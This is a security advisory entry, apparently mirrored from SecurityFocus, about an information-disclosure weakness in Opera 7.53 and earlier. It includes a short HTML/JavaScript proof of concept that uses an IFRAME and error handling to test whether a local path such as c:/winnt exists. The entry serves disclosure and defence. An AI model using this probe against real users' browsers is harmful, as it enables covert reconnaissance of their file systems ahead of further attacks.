28 lines
No EOL
1 KiB
Text
28 lines
No EOL
1 KiB
Text
source: https://www.securityfocus.com/bid/10961/info
|
|
|
|
Opera Web Browser is prone to a security weakness that may permit an attacker to determine the existence of resources on a vulnerable computer.
|
|
|
|
An attacker can use an IFRAME that is accessible within the same domain and change its URI to the location of a file or directory. The attacker can then determine the existence of the resource by the error message returned by Opera.
|
|
|
|
This weakness can then allow the attacker to carry out other attacks against a vulnerable computer.
|
|
|
|
Opera 7.53 and prior versions running Windows, Unix, and Apple platforms are reported vulnerable to this issue.
|
|
|
|
<iframe src="blank.html"></iframe>
|
|
<script type="text/javascript">
|
|
onload=function () {
|
|
????var sLocal="c:/winnt";
|
|
????frames[0].location.href=sLocal;
|
|
????setTimeout(
|
|
????????function () {
|
|
????????????try {
|
|
????????????????frames[0].document;
|
|
????????????????alert(sLocal+" does not exists.");
|
|
????????????} catch (oErr) {
|
|
????????????????alert(sLocal+" exists.");
|
|
????????????}
|
|
????????},
|
|
????????250
|
|
????);
|
|
}
|
|
</script> |